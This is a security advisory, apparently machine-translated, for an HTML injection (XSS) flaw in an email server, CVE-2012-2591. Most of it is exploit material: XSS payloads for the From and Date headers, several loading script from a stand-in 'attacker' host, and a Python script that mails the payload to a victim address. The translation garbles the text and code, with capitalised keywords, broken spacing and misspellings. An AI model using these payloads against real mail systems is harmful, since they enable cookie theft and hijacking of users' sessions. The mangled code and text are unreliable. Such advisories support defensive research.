Release date:
Updated on:
Affected Systems:
Emaileffecect Email Server 10.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54896
Cve id: CVE-2012-2591
Emaileffecect is an email server.
The implementation of emaileffecect 10.0 and other versions has the HTML injection vulnerability. Attackers can provide HTML or JS Code to run in the affected site, steal cookie authentication creden。, or control the site appearance.
<* Source: loneferret
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Nstalled On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86), OS: mac OS Lion
Browser Used: Internet Explorer 9, Firefox 12
Injection Point: From
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
Injection Point: Date
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <SCRIPT> alert ('xsss') </SCRIPT>
3: <script src = http: // attacker/xss. js> </SCRIPT>
4: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
5: <iframe src = "javascript: alert ('xss');"> </IFRAME>
6: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
7: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
8: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>
'''
Import smtplib, urllib2
Payload = "" <script src = http: // attacker/xss. js> </SCRIPT> """
Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = "Date: Today" + payload + "\ r \ n"
Msg + = "Subject: XSS \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS. \ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()
Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"
Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Emaileffecect
--------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.emailarchitect.net/